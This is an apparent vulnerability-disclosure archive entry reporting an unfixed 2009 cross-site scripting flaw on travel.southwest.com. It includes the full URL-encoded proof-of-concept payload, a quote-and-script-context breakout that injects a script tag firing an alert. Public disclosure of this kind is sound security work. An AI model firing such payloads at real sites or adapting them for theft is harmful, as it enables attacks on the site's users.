Security researcher XSSLotion, has submitted on 09/04/2009 a cross-site-scripting (XSS) vulnerability affecting travel.southwest.com, which at the time of submission ranked 734 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 09/04/2009 |
Date published: 22/05/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: XSSLotion |
Domain: travel.southwest.com |
Category: XSS |
Pagerank: 734 |
URL: http://travel.southwest.com/search/search.html?btnG=Search&entqr=0&output=xml_no_dtd&ud=1&client=tra vel&oe=UTF-8&ie=UTF-8&proxystylesheet=travel&site=travel&proxyreload=0&q=%27%3Balert%28String.fromCh arCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22% 3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C 83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83 %2C83%29%29%3C%2FSCRIPT%3E |
Click here to view the mirror
|
|
|